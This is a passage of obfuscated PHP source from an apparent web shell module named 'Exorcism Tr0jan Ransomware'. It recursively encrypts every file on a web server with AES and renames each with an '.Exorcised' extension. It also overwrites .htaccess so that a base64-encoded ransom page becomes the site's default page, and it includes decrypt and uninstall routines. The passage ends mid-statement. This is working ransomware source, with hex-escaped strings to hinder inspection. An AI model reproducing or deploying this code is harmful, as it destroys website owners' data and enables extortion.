<a style="width: 250px;" class="form-control" onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER["\x53\105\122\126\105\122\137\101\104\104\x52"]; ?>
','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER["\x53\105\x52\x56\105\x52\x5f\101\104\x44\x52"]; ?>
">[ Reverse IP Lookup ] </a>
</center>
<br>
<hr>
<?php } elseif (isset($_GET[hex("\162\x61\156\163\x6f\155\x77\x61\162\145")])) { if (version_compare(PHP_VERSION, "\x37\56\62\x2e\60", "\x3e")) { echo "\74\x62\162\x3e\x3c\142\162\76\74\146\x6f\x6e\164\x20\143\157\154\157\x72\x20\x3d\x20\x72\145\x64\x3e\124\x6f\157\154\x73\40\x52\x61\156\163\157\x6d\167\141\162\x65\x20\111\x6e\x69\x20\110\141\156\x79\141\x20\x62\151\x73\141\x20\142\x65\x72\152\141\154\x61\156\40\144\151\x20\120\110\120\x20\x76\145\162\x73\x69\40\67\x2e\62\x20\x6b\145\x20\x62\x61\167\141\150\40\x73\x61\152\141\40\56\40\x75\156\x74\x75\153\40\120\x48\120\40\166\x65\162\x73\151\40\67\56\62\x20\x6b\x65\x20\x61\164\141\x73\x20\x6d\x61\163\x69\x68\40\x70\x72\157\163\145\x73\40\160\145\x6d\142\165\141\x74\x61\x6e\x20\x3c\57\x66\157\156\164\x3e\x20"; die; } ?>
<br>
<hr>
<html>
<head>
<link rel="icon" type="image/gif" href="https://s-media-cache-ak0.pinimg.com/236x/a7/76/ec/a776ec52e575d0473d33557aa610e47d--skull-fashion-flower-tattoos.jpg">
<link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'>
<title> ҳ̸Ҳ̸ҳ Exorcism Tr0jan Ransomware ҳ̸Ҳ̸ҳ</title>
<style type="text/css">
.inpute {
width: 500px;
height: 20px;
border-color: #EA2A14;
color: lime;
text-align: center;
}
.selecte {
border-color: lime;
width: 300px;
height: 30px;
background-color: transparent;
color: lime;
}
.submite {
width: 200px;
border-color: #EA2A14;
background-color: transparent;
color: red;
}
.item {
background-color: black;
}
</style>
</head>
<body>
<?php error_reporting(0); set_time_limit(0); ini_set("\x6d\x65\155\157\162\171\x5f\154\151\x6d\151\164", "\55\x31"); class deRanSomeware { public function shcpackInstall() { if (!file_exists("\x2e\x68\x74\x61\145\x6e\143\162\171\x70\x74\x65\144")) { rename("\x2e\x68\164\141\143\143\145\x73\x73", "\x2e\150\x74\141\145\156\143\x72\171\x70\164\145\144"); if (fwrite(fopen("\56\x68\164\x61\x63\143\145\163\x73", "\167"), "\x23\x45\170\157\162\143\151\x73\155\x20\x52\141\156\x73\157\155\167\141\x72\145\xd\12\x44\x69\162\x65\x63\164\x6f\162\x79\111\156\144\145\170\x20\166\151\162\x75\x73\x2e\160\x68\x70\xd\12\105\162\162\x6f\162\104\x6f\143\x75\155\x65\x6e\164\40\x34\60\64\40\57\166\x69\162\x75\163\x2e\x70\x68\x70")) { echo "\74\x69\40\143\x6c\141\x73\163\75\42\146\141\x20\x66\141\x2d\x74\x68\165\155\x62\x73\55\x6f\55\x75\160\x22\40\x61\x72\x69\x61\55\x68\151\x64\x64\x65\x6e\x3d\x22\164\x72\165\145\x22\76\74\57\x69\x3e\x20\x2e\x68\164\x61\143\x63\x65\163\x73\x20\x28\x44\145\146\x61\x75\154\x74\40\x50\141\147\x65\51\74\x62\x72\76"; } if (file_put_contents("\166\x69\162\165\163\56\160\150\160", base64_decode("\x50\x47\x68\x30\x62\127\167\x2b\x44\121\157\70\131\155\71\x6b\x65\x54\64\x4e\103\x6a\170\x6f\132\x57\x46\x6b\120\147\60\113\104\x51\x6f\x38\144\107\154\x30\x62\107\x55\53\122\127\65\152\x63\156\154\167\144\107\126\153\111\124\x77\x76\x64\107\154\60\142\107\125\53\104\121\157\116\103\152\167\x76\141\107\x56\x68\132\104\64\x4e\103\x6a\x78\x73\141\x57\65\162\x49\x48\x4a\154\x62\x44\x30\x69\141\127\116\166\x62\151\111\x67\x64\x48\154\x77\x5a\x54\x30\x69\141\x57\x31\x68\132\x32\x55\166\x5a\x32\154\155\x49\151\102\x6f\143\155\x56\155\x50\123\112\157\x64\110\122\167\x63\172\x6f\166\x4c\x33\115\x74\142\x57\x56\153\x61\127\105\164\x59\x32\x46\x6a\141\107\x55\x74\131\127\163\167\x4c\156\102\160\142\155\154\x74\x5a\171\65\x6a\142\62\60\x76\x4d\x6a\115\62\145\103\x39\150\116\x79\x38\x33\x4e\x69\x39\154\x59\171\71\150\x4e\x7a\x63\62\132\x57\x4d\61\115\155\x55\61\x4e\172\x56\x6b\x4d\104\x51\x33\115\x32\x51\x7a\x4d\172\x55\x31\x4e\x32\x46\150\116\152\105\167\x5a\124\121\x33\x5a\x43\x30\x74\x63\x32\x74\61\142\107\x77\164\x5a\x6d\106\172\x61\107\x6c\166\x62\x69\61\155\x62\x47\x39\x33\132\x58\111\x74\x64\x47\x46\x30\x64\x47\71\166\x63\x79\x35\x71\x63\107\143\151\x50\x67\x30\x4b\120\x47\x4a\166\132\110\x6b\147\131\x6d\x64\x6a\142\62\x78\166\143\151\101\71\x49\x43\144\151\142\107\x46\152\x61\171\x63\x2b\x44\121\x6f\x38\x59\x32\x56\165\144\x47\126\171\x50\x67\60\x4b\104\x51\x6f\x38\143\x33\122\65\142\x47\125\x67\x64\110\x6c\x77\x5a\x54\x30\156\x64\107\126\64\x64\103\x39\x6a\x63\63\x4d\156\x50\155\x4a\166\132\x48\x6b\x73\111\107\x45\x73\111\x47\105\x36\x62\x47\x6c\x75\x61\x33\164\152\144\x58\112\172\x62\63\x49\66\144\x58\112\163\113\107\150\x30\144\110\101\x36\x4c\x79\x38\60\x4c\x6d\112\x77\114\155\112\163\142\x32\x64\x7a\143\x47\71\x30\114\155\116\166\142\123\x38\x74\141\x45\x46\x47\x4e\x33\x52\x51\126\x57\x35\164\122\125\125\166\x56\110\x64\110\125\x6a\116\x73\x55\x6b\x67\x77\122\x55\153\x76\x51\x55\x46\102\x51\x55\x46\102\121\125\106\x42\143\172\x67\x76\x4e\156\x42\x72\x61\124\111\x79\x61\x47\115\x7a\x54\153\125\166\143\172\x45\x32\115\x44\x41\x76\x59\130\x4e\x7a\114\x6e\x42\165\132\x79\153\163\x49\107\122\x6c\x5a\155\x46\61\142\110\121\67\x66\123\102\x68\117\x6d\x68\x76\144\x6d\x56\x79\x49\x48\x74\152\144\x58\112\x7a\142\63\111\66\144\130\x4a\163\113\107\150\60\144\110\x41\x36\114\171\70\x7a\114\155\x4a\x77\x4c\x6d\x4a\163\x62\x32\144\x7a\x63\107\x39\60\114\155\116\166\142\x53\70\x74\x59\154\112\160\x61\x32\x64\170\132\126\x70\64\x4d\x46\105\x76\126\110\144\110\x55\x6a\122\x4e\x56\125\x56\x44\x4e\60\153\166\x51\125\106\102\121\125\106\x42\x51\125\106\x42\x64\105\x45\x76\141\x58\116\x4b\142\126\115\167\x63\x6a\x4d\x31\125\x58\x63\166\143\172\105\62\x4d\104\x41\166\143\107\x39\160\x62\156\x52\x6c\143\151\x35\167\x62\x6d\143\160\114\x48\144\150\x61\130\121\x37\x66\124\x77\166\143\x33\122\65\x62\x47\x55\x2b\104\121\x6f\x38\143\x48\112\x6c\x49\x48\116\60\x65\127\x78\x6c\120\x53\x4a\x6d\142\62\x35\60\117\x69\101\170\x4d\156\x42\x34\114\x7a\x45\x79\143\x48\x67\x67\x62\127\71\165\142\x33\x4e\x77\131\x57\x4e\x6c\117\x79\111\53\120\x47\x5a\166\x62\156\121\147\131\x32\71\163\142\x33\x49\x67\120\123\x41\x6e\143\155\x56\153\x4a\172\x34\116\x43\156\126\x31\144\130\126\61\x64\x58\125\x4e\103\x6e\126\61\112\x43\x51\x6b\x4a\x43\121\x6b\112\103\x51\153\x4a\103\122\x31\x64\x51\60\x4b\x64\x58\x55\153\x4a\103\121\153\x4a\103\x51\x6b\112\x43\121\153\112\x43\121\153\x4a\x43\x51\x6b\112\x48\x56\61\x44\x51\x70\61\x4a\103\121\x6b\x4a\x43\121\153\112\103\x51\x6b\112\103\x51\153\x4a\x43\121\x6b\112\103\121\153\112\103\x51\153\x64\x51\x30\113\x64\x53\x51\x6b\112\x43\121\153\112\x43\121\x6b\112\103\x51\x6b\x4a\103\121\x6b\x4a\x43\x51\x6b\x4a\103\121\x6b\112\x43\x51\x6b\144\121\60\x4b\144\x53\x51\x6b\x4a\103\x51\x6b\x4a\103\x51\x6b\112\103\x51\x6b\112\103\x51\x6b\112\x43\x51\153\x4a\103\121\x6b\112\x43\121\153\112\x43\122\x31\x44\x51\x70\x31\x4a\103\121\153\112\x43\121\x6b\x4a\103\121\x6b\x4a\103\121\x6b\x4a\103\121\x6b\x4a\103\x51\153\112\x43\121\153\x4a\103\121\153\x4a\x48\x55\116\x43\156\x55\153\112\103\x51\x6b\x4a\103\x51\x69\111\103\101\147\x49\151\121\153\112\x43\111\x67\111\103\101\151\112\x43\121\x6b\112\103\121\153\x64\x51\60\x4b\111\x69\121\153\x4a\x43\121\151\x49\x43\101\x67\111\x43\x41\147\x64\x53\122\x31\111\103\101\147\111\x43\101\147\x49\103\121\153\112\103\x51\x69\x44\x51\157\153\112\103\122\61\x49\x43\x41\147\x49\x43\101\147\111\110\x55\153\144\123\x41\x67\111\103\101\147\x49\x43\x42\61\x4a\x43\121\153\x44\x51\x6f\x6b\x4a\103\x52\61\111\x43\x41\147\111\x43\x41\x67\144\123\121\153\x4a\x48\x55\x67\111\103\101\x67\111\x43\x42\x31\x4a\103\121\153\104\x51\157\151\112\x43\x51\153\112\110\x56\61\112\103\x51\153\x49\103\101\x67\x4a\103\x51\x6b\144\130\125\153\112\103\121\153\111\147\60\x4b\111\151\x51\x6b\112\x43\121\x6b\x4a\x43\x51\x69\x49\103\x41\147\111\x69\121\x6b\x4a\x43\121\x6b\112\103\121\151\104\x51\160\61\x4a\103\x51\153\112\x43\121\x6b\x4a\110\x55\153\112\x43\121\153\x4a\103\x51\153\x64\x51\x30\113\144\x53\x51\x69\x4a\x43\x49\x6b\111\151\121\151\x4a\103\x49\x6b\111\x69\122\61\x44\121\160\61\x64\x58\x55\x67\111\103\x41\x67\x49\x43\x41\147\x49\103\x51\153\144\x53\121\x67\x4a\103\x41\x6b\111\x43\x51\147\112\x48\x55\x6b\x4a\103\101\147\x49\103\101\x67\x49\x43\102\61\x64\x58\125\116\x43\x6e\x55\x6b\112\103\121\x6b\111\103\101\147\111\x43\x41\x67\x49\x43\101\x6b\112\x43\121\153\112\x48\125\x6b\x64\123\x52\x31\112\x43\121\153\111\103\x41\x67\111\103\101\147\x49\110\x55\153\x4a\x43\121\x6b\x44\x51\x6f\x67\x4a\x43\121\153\x4a\x43\122\61\144\123\x41\147\x49\x43\x41\147\x49\103\111\x6b\x4a\103\121\153\112\103\x51\x6b\x4a\x43\121\x69\x49\103\101\x67\111\x43\x42\61\x64\x53\121\153\112\x43\121\153\x4a\101\60\113\x49\110\x55\153\x4a\103\121\153\112\x43\x51\153\112\x43\x51\153\x4a\x48\126\x31\111\103\x41\x67\111\103\x49\x69\111\151\x49\x69\x49\x43\101\x67\x49\x48\x56\61\144\130\x55\x6b\x4a\103\x51\x6b\x4a\x43\121\153\x4a\103\121\153\x44\121\157\147\111\x43\101\x6b\x4a\x43\x51\x6b\x49\151\x49\x69\x4a\x43\x51\153\112\x43\x51\153\112\103\x51\x6b\112\x48\x56\61\x64\123\101\147\x49\110\x56\x31\112\103\121\153\x4a\103\x51\153\112\x43\121\x6b\111\x69\x49\x69\112\103\121\x6b\111\147\60\113\111\x69\x49\x69\x49\103\101\x67\111\x43\101\x67\x49\151\111\153\x4a\103\x51\153\112\103\x51\x6b\112\x43\121\x6b\x4a\110\126\x31\x49\103\x49\x69\112\x43\x49\x69\111\x69\101\x67\111\103\x41\147\104\121\157\147\x49\x43\101\x67\x64\x58\x56\61\x64\123\101\151\x49\x69\x51\x6b\112\x43\121\153\x4a\x43\x51\x6b\x4a\103\122\x31\x64\x58\125\116\103\x69\101\x67\x49\x43\x42\61\x4a\x43\x51\153\144\130\x56\x31\112\103\x51\153\112\103\121\x6b\112\103\x51\x6b\x64\x58\125\147\x49\151\x49\153\112\103\x51\x6b\x4a\x43\121\x6b\x4a\x43\x51\x6b\112\110\x56\61\144\123\x51\x6b\x4a\x41\x30\113\x49\103\x41\147\x49\103\101\x6b\112\103\121\153\x4a\103\x51\153\112\x43\121\153\111\x69\111\x69\x49\151\101\x67\111\x43\x41\147\111\x43\101\x67\x49\x43\101\147\111\x69\111\x6b\112\103\121\x6b\112\103\x51\x6b\112\103\x51\153\x4a\103\x49\x4e\103\151\101\x67\111\103\x41\x67\111\x43\111\153\112\103\121\x6b\x4a\103\x49\147\111\103\101\147\111\103\101\147\111\103\101\x67\111\103\x41\147\111\103\101\147\111\x43\x41\147\111\x43\x41\x67\x49\x69\x49\153\112\103\x51\153\x49\151\x49\x4e\103\151\x41\x67\x49\103\x41\147\x49\x43\x41\x6b\x4a\x43\121\151\111\103\x41\x67\x49\x43\101\x67\111\103\x41\x67\x49\103\x41\147\x49\103\x41\x67\111\103\101\x67\111\x43\x41\x67\111\x43\101\147\x49\103\121\153\x4a\103\121\x69\x44\121\x6f\x38\x4c\63\102\171\x5a\124\x34\x38\x4c\x32\132\x76\142\156\x51\x2b\104\121\x6f\70\x62\107\154\x75\141\x79\102\157\x63\x6d\126\155\120\123\x64\157\144\110\122\x77\x4f\151\x38\166\x5a\155\71\x75\144\110\x4d\x75\132\x32\x39\x76\x5a\x32\170\x6c\x59\130\102\x70\x63\x79\65\152\x62\x32\60\166\131\x33\x4e\172\x50\x32\132\150\x62\x57\x6c\x73\x65\124\x31\112\x59\62\x56\163\x59\127\65\153\112\171\102\171\132\127\167\x39\112\63\x4e\x30\145\127\x78\x6c\143\62\150\x6c\x5a\130\121\156\111\x48\122\x35\143\x47\125\x39\112\63\x52\x6c\x65\x48\121\x76\x59\x33\x4e\172\112\x7a\x34\116\103\152\x78\155\x62\62\65\60\x49\x47\x5a\x68\131\x32\125\71\111\155\x6c\152\132\127\170\150\x62\155\x51\151\x49\x48\116\160\x65\x6d\x55\71\x49\x6a\x45\x77\111\151\102\x6a\x62\x32\x78\x76\143\151\x41\x39\111\x43\144\171\x5a\127\x51\156\120\x6c\x6c\x76\x64\130\111\x67\x56\62\126\151\x63\62\x6c\60\132\x53\x42\x49\x59\x58\x5a\x6c\111\105\112\154\x5a\127\x34\147\x52\127\x35\x6a\143\156\154\167\x64\107\126\x6b\x49\123\101\70\131\x6e\x49\x2b\x44\121\157\x38\x5a\155\x39\x75\x64\103\x42\172\x61\x58\160\154\111\104\60\147\x4a\x7a\x59\156\x50\153\x4a\65\111\x44\x78\151\143\152\x35\x46\x65\107\71\x79\x59\x32\154\x7a\142\123\x41\155\111\106\x4e\154\131\63\x56\171\x61\130\122\65\x58\60\x68\61\142\x6e\x52\x6c\x63\156\157\x38\114\x32\132\166\x62\x6e\121\x2b\x50\x47\112\x79\120\x6a\167\166\132\155\71\x75\144\x44\x34\70\x59\156\111\53\x44\x51\157\70\132\155\71\165\144\x43\102\x6d\131\127\116\x6c\111\x44\x30\147\112\62\x6c\152\132\127\170\x68\x62\155\121\156\x49\110\x4e\x70\145\155\x55\147\x50\123\x41\156\116\151\x63\x67\x59\x32\x39\163\142\x33\111\x67\120\x53\101\156\x64\62\x68\160\x64\107\x55\156\120\x6c\x64\x6f\131\x58\121\x67\x53\107\x46\x77\x63\107\126\x75\x5a\x57\x51\x67\126\x47\x38\147\127\127\71\x31\143\151\x42\x58\x5a\127\112\x7a\x61\130\x52\154\120\x79\x41\116\x43\x67\x6b\112\x50\107\112\x79\120\x6a\x78\x69\143\152\x34\x67\x44\x51\x6f\112\103\x54\x78\155\142\62\x35\x30\x49\x48\116\x70\145\155\x55\x39\112\172\125\x6e\x49\x47\x4e\166\142\x47\x39\171\111\104\x30\x67\x4a\63\x4a\154\132\103\143\53\x57\127\x39\61\x63\151\102\160\x62\130\102\x76\143\x6e\x52\x68\142\x6e\121\x67\x64\x32\126\151\x63\x32\x6c\60\x5a\123\x42\155\141\127\x78\x6c\143\x79\102\150\x63\155\x55\x67\132\127\65\x6a\143\156\154\x77\144\107\126\153\x4c\x6a\x78\x69\143\x6a\x34\x4e\x43\x67\153\112\x50\x47\132\166\142\156\121\x67\131\62\x39\x73\142\x33\111\x39\x4a\63\144\157\x61\130\122\x6c\112\172\64\116\x43\147\x6b\112\x54\127\106\165\x65\123\102\166\x5a\151\102\65\142\x33\126\171\111\x43\65\x77\141\x48\101\163\x49\103\65\152\x63\63\x4d\163\x49\x43\x35\161\143\171\x77\x67\131\x57\x35\153\111\107\x39\60\141\107\x56\171\111\x47\x5a\x70\x62\x47\x56\172\111\x47\106\171\x5a\123\x42\x75\142\171\x42\163\x62\62\65\156\x5a\130\111\147\131\127\116\152\132\x58\116\172\141\127\112\154\x62\x41\60\x4b\x43\x51\154\151\132\127\x4e\x68\x64\x58\x4e\154\111\110\122\x6f\132\130\153\x67\x61\x47\x46\x32\x5a\x53\x42\x69\132\x57\126\165\x49\107\x56\165\x59\x33\112\65\x63\x48\122\154\132\x43\64\147\x50\x47\112\x79\x50\x6b\61\x68\145\127\112\x6c\x49\x48\154\166\x64\123\102\x68\x63\x6d\125\x67\131\156\x56\x7a\145\x53\102\163\x62\x32\71\x72\141\127\x35\156\x49\x47\x5a\166\143\151\x42\x68\x49\110\144\150\x65\123\102\60\142\171\101\x4e\103\147\x6b\x4a\143\x6d\126\152\142\63\x5a\154\143\x69\102\65\142\63\126\171\x49\107\x5a\x70\142\107\126\172\114\104\x78\151\x63\x6a\x34\147\131\156\126\60\111\107\122\166\x49\x47\x35\x76\144\x43\102\x33\x59\130\116\x30\132\123\x42\65\x62\x33\x56\x79\x49\110\x52\160\x62\x57\x55\150\x50\x47\112\x79\x50\x69\x42\x4f\x62\62\112\x76\132\110\153\147\x59\x32\x46\x75\x49\x47\x52\x6c\x59\x33\x4a\x35\x63\110\121\147\145\x57\x39\61\x63\151\102\x6d\x61\x57\x78\154\143\x77\x30\x4b\103\121\154\x33\141\x58\x52\157\x62\x33\126\x30\111\107\71\61\143\x69\102\172\143\x47\x56\x6a\x61\127\106\163\x49\x47\x52\154\131\63\x4a\x35\143\110\x52\160\142\x32\x34\147\x63\x32\x56\171\144\x6d\154\152\x5a\x53\x34\147\x50\107\112\171\x50\147\x30\x4b\x44\x51\x6f\x4a\103\124\x78\155\x62\62\x35\60\111\105\116\x76\142\107\71\171\111\104\x30\x67\x4a\63\x4a\x6c\x5a\x43\x63\53\122\107\70\x67\x54\x6d\71\x30\x49\106\x52\171\x65\123\102\x55\x62\x79\102\105\132\127\116\x79\145\130\102\60\x49\105\112\65\111\x46\154\x76\144\x58\111\x67\x55\x32\x56\163\132\151\x77\x67\x54\x33\111\x67\x57\x57\71\x31\x63\151\102\107\x61\127\170\154\x63\171\102\x58\x61\x57\170\163\111\x45\112\x6c\x49\x45\122\x6c\x62\107\126\x30\x5a\x57\121\147\x51\130\126\x30\x62\x32\61\x68\x64\107\154\152\x59\127\x78\163\145\x53\x34\x67\120\x47\112\x79\x50\152\x78\151\143\152\64\x4e\103\147\153\x4a\x43\124\170\155\x62\x32\65\60\111\107\116\x76\x62\107\x39\x79\x49\x44\60\x6e\x64\x32\150\160\x64\107\125\x6e\x49\110\x4e\160\x65\155\x55\71\x49\152\x59\151\x50\x69\x42\111\x62\x33\143\147\144\x47\x38\x67\143\x6d\x56\x6a\142\x33\132\x6c\x63\x69\x42\65\x62\x33\x56\171\111\110\x64\x6c\131\156\116\160\144\107\125\57\x49\104\x78\151\143\x6a\64\x38\132\155\71\x75\144\x43\102\x7a\141\x58\160\154\111\x44\x30\x67\112\172\x55\156\120\x67\x30\x4b\x43\121\x6b\112\x55\63\126\171\x5a\x53\x77\x67\144\x32\x55\147\132\63\x56\150\x63\155\x46\x75\x64\107\x56\x6c\x49\x48\122\x6f\131\x58\121\147\x65\x57\71\x31\111\107\116\150\142\151\x42\171\132\x57\116\166\x64\155\126\171\x49\x47\106\x73\x62\103\x42\65\x62\x33\x56\x79\111\x47\132\160\142\107\x56\172\111\x48\116\x68\132\x6d\126\163\x65\123\102\x68\x62\x6d\121\147\x5a\127\x46\x7a\x61\x57\x78\x35\114\151\x42\103\144\130\x51\147\x65\127\x39\61\x49\107\x68\x68\x64\x6d\125\147\142\155\71\60\111\x47\126\165\x62\63\126\156\x61\103\x42\60\141\x57\x31\x6c\114\x6a\170\x69\x63\x6a\64\x4e\x43\x67\153\x4a\x43\130\x64\x6c\111\107\x4e\150\x62\151\102\153\132\x57\x4e\x79\145\x58\102\x30\111\107\106\163\x62\x43\102\x35\142\63\x56\x79\111\110\x64\154\x59\156\116\x70\144\107\x55\147\x5a\155\x6c\x73\x5a\x53\x42\x7a\131\127\132\x6c\x62\x48\153\x73\111\x47\150\166\x64\x79\x41\57\111\x46\x6c\166\x64\123\x42\x4e\x64\130\x4e\60\x49\106\x42\150\145\123\x42\160\144\103\102\x33\x61\x58\x52\x6f\120\x47\132\166\x62\156\121\x67\131\x32\x39\x73\x62\63\x49\x39\111\156\112\154\132\103\111\x2b\111\x44\x45\x79\115\103\x52\103\x61\x58\122\152\x62\62\x6c\165\x50\x43\71\x6d\x62\x32\65\x30\120\x6a\170\x69\x63\152\64\x4e\103\147\153\112\103\x55\154\x6d\x49\110\x6c\x76\x64\x53\x42\x75\132\127\x56\153\x49\x47\71\x31\143\x69\x42\x68\x63\63\116\160\x63\63\x52\x68\142\155\116\154\114\x43\x42\132\x62\x33\x55\147\x59\x32\x46\165\x49\107\x4e\x76\142\156\122\150\x59\x33\x51\147\144\x58\x4d\147\144\x6d\154\150\111\x47\126\164\x59\127\154\x73\x4f\x69\61\x62\x52\x58\x68\166\x63\155\x4e\160\143\62\x30\x30\x4d\x44\122\x41\141\107\106\152\141\x32\x56\x79\142\x57\106\x70\x62\103\x35\152\x62\62\x31\144\x4c\x53\x41\x38\x59\156\x49\53\x50\107\x4a\171\120\x67\x30\113\x43\x51\x6b\112\x51\127\132\x30\132\x58\111\147\127\x57\x39\61\x49\106\x42\150\x65\x53\x42\160\x64\103\64\x67\x56\x32\x55\x67\126\x32\154\x73\x62\x43\x42\x45\x5a\127\x4e\x79\x65\130\102\60\111\106\122\x6f\132\x53\x42\x46\142\x6d\116\x79\x65\130\x42\x30\x5a\x57\x51\x67\122\155\x6c\163\132\130\x4d\147\x53\x57\64\x67\x57\x57\x39\61\143\x69\102\130\x5a\x57\x4a\x7a\x61\x58\x52\x6c\x4c\x67\x30\113\103\x51\x6b\70\114\62\x5a\166\142\x6e\x51\53\104\121\157\x4a\x43\124\170\151\x63\152\64\116\103\x67\153\x4a\x50\107\112\x79\120\x67\60\113\x44\x51\157\x4e\103\147\x30\x4b\x44\121\x6f\x4e\103\152\167\x76\131\62\x56\165\x64\x47\126\x79\120\147\x30\113\x50\103\71\151\x62\62\122\65\x50\x67\60\x4b\x44\121\x6f\116\103\x6a\x77\166\141\x48\122\x74\142\x44\x34\x3d"))) { echo "\x3c\x69\x20\143\154\141\x73\163\75\x22\146\141\40\x66\141\x2d\164\x68\165\155\142\x73\x2d\x6f\x2d\165\x70\x22\x20\x61\162\151\141\x2d\x68\x69\x64\144\x65\156\x3d\x22\164\162\x75\145\42\76\74\57\x69\76\x20\x20\x76\x69\162\165\163\56\160\150\160\x20\50\x44\x65\146\x61\x75\154\x74\40\x50\141\x67\x65\51\x3c\142\x72\x3e"; } } } public function shcpackUnstall() { if (file_exists("\x2e\150\164\x61\145\156\143\x72\171\x70\x74\145\x64")) { if (unlink("\x2e\x68\164\x61\x63\143\145\x73\x73") && unlink("\x76\x69\162\x75\x73\56\160\x68\x70")) { echo "\x3c\x69\x20\143\154\141\163\163\x3d\x22\x66\x61\40\x66\141\x2d\164\150\x75\x6d\x62\163\55\x6f\55\144\x6f\167\156\x22\40\x61\x72\x69\141\55\x68\151\x64\144\x65\156\x3d\x22\164\162\x75\145\42\x3e\74\x2f\x69\76\x20\x2e\150\164\x61\x63\143\145\163\x73\40\x28\x44\x65\146\141\x75\154\x74\x20\x50\141\x67\145\x29\x3c\142\162\76"; echo "\74\151\x20\143\154\x61\x73\163\x3d\42\x66\x61\40\146\x61\x2d\164\150\165\155\x62\x73\55\x6f\x2d\144\x6f\x77\x6e\42\40\141\162\x69\141\x2d\x68\151\x64\x64\145\156\75\x22\x74\x72\165\x65\x22\x3e\74\x2f\151\76\x20\x76\151\x72\x75\163\x2e\x70\150\160\40\50\104\145\146\x61\165\x6c\164\40\120\141\147\x65\x29\74\142\162\76"; } rename("\x2e\150\164\x61\x65\x6e\x63\162\x79\160\164\x65\144", "\x2e\x68\164\141\143\x63\x65\x73\x73"); } } public function plus() { flush(); ob_flush(); } public function locate() { return getcwd(); } public function shcdirs($dir, $method, $key) { switch ($method) { case "\61": deRanSomeware::shcpackInstall(); break; case "\x32": deRanSomeware::shcpackUnstall(); break; } foreach (scandir($dir) as $d) { if ($d != "\x2e" && $d != "\56\x2e") { $locate = $dir . DIRECTORY_SEPARATOR . $d; if (!is_dir($locate)) { if (deRanSomeware::kecuali($locate, "\151\144\x78\x2e\x70\150\x70") && deRanSomeware::kecuali($locate, "\56\150\164\141\x63\143\145\x73\163") && deRanSomeware::kecuali($locate, "\x76\x69\x72\x75\163\x2e\160\150\160") && deRanSomeware::kecuali($locate, "\151\156\x64\x65\170\56\160\x68\x70") && deRanSomeware::kecuali($locate, "\x2e\150\164\x61\145\156\x63\162\171\x70\164\145\x64")) { switch ($method) { case "\x31": deRanSomeware::shcEnCry($key, $locate); deRanSomeware::shcEnDesDirS($locate, "\x31"); break; case "\x32": deRanSomeware::shcDeCry($key, $locate); deRanSomeware::shcEnDesDirS($locate, "\62"); break; } } } else { deRanSomeware::shcdirs($locate, $method, $key); } } deRanSomeware::plus(); } } public function shcEnDesDirS($locate, $method) { switch ($method) { case "\61": rename($locate, $locate . "\x2e\105\x78\157\x72\143\151\x73\145\x64"); break; case "\62": $locates = str_replace("\56\x45\x78\x6f\162\x63\x69\163\145\x64", '', $locate); rename($locate, $locates); break; } } public function shcEnCry($key, $locate) { $data = file_get_contents($locate); $iv = mcrypt_create_iv(mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC), MCRYPT_DEV_URANDOM); $encrypted = base64_encode($iv . mcrypt_encrypt(MCRYPT_RIJNDAEL_128, hash("\x73\x68\x61\x32\65\x36", $key, true), $data, MCRYPT_MODE_CBC, $iv)); if (file_put_contents($locate, $encrypted)) { echo "\x3c\x69\40\143\154\x61\x73\x73\x3d\42\146\141\x20\x66\x61\55\x6c\x6f\x63\x6b\x22\x20\x61\x72\x69\x61\55\x68\151\x64\144\x65\156\75\x22\x74\162\165\145\42\76\x3c\x2f\x69\76\x20\74\146\x6f\x6e\164\40\x63\157\154\x6f\162\75\42\43\x30\x30\x42\x43\x44\x34\42\x3e\114\x6f\143\153\145\x64\x3c\x2f\146\x6f\x6e\x74\76\40\x28\74\146\157\x6e\164\40\x63\x6f\x6c\x6f\x72\x3d\42\x23\x34\60\103\x45\60\70\42\76\x53\x75\x63\143\x65\163\x73\x3c\57\x66\157\x6e\164\x3e\x29\x20\74\x66\157\156\x74\40\143\157\154\157\162\75\x22\43\106\106\71\x38\x30\60\42\x3e\174\74\x2f\x66\157\156\x74\76\x20\x3c\146\157\156\x74\40\143\157\x6c\x6f\x72\75\42\x23\x32\61\x39\x36\x46\63\x22\x3e" . $locate . "\x3c\57\146\x6f\156\164\76\x20\x3c\142\162\76"; } else { echo "\74\151\40\143\x6c\141\x73\163\x3d\42\146\x61\40\146\x61\x2d\x6c\157\x63\153\42\40\x61\x72\x69\x61\x2d\x68\151\x64\x64\x65\156\x3d\x22\x74\x72\x75\x65\42\x3e\74\57\x69\76\x20\74\x66\157\156\x74\x20\143\x6f\x6c\x6f\x72\75\x22\43\60\60\102\103\x44\x34\x22\76\x4c\157\143\x6b\145\x64\x3c\x2f\x66\x6f\156\x74\76\x20\50\x3c\x66\x6f\x6e\164\x20\x63\157\x6c\157\162\75\x22\162\145\x64\42\x3e\x46\141\x69\x6c\x65\x64\74\x2f\x66\x6f\156\164\x3e\x29\x20\74\146\157\x6e\x74\x20\x63\x6f\154\157\x72\x3d\42\x23\x46\x46\x39\x38\x30\x30\x22\76\174\74\x2f\x66\x6f\156\164\76\x20" . $locate . "\40\x3c\142\x72\76"; } } public function shcDeCry($key, $locate) { $data = base64_decode(file_get_contents($locate)); $iv = substr($data, 0, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)); $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128, hash("\x73\150\x61\x32\x35\66", $key, true), substr($data, mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)), MCRYPT_MODE_CBC, $iv), "\0"); if (file_put_contents($locate, $decrypted)) { echo 